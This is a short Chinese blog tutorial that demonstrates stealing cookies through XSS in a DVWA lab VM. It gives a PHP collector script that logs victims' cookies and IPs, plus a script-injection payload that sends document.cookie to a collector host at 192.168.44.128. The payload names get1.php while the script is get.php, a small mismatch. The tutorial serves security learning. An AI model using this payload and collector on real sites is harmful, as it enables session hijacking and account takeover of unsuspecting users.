简单的利用XSS获取用户cookie

跨站脚本攻击(XSS)

  跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

这里简单的演示下,将cookie获取到自己的搭建DVWA的虚拟机里面。

1.首先写一个获取cookie的脚本 get.php

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>   

2.将该脚本上传到/var/www/html目录下,和DVWA在同一目录下

3.测试脚本是否可

curl 127.0.0.1/get.php?cookie=shy

4,将构造的XSS的payload插入到DVWA页面

<script>document.location='http://192.168.44.128/get1.php?cookie='+document.cookie;</script>

点击提交后,跳转到空白页面

5,这时去虚拟机里面查看,发现获取到了当前用户的cookie

发布了41 篇原创文章 · 获赞 5 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/102736806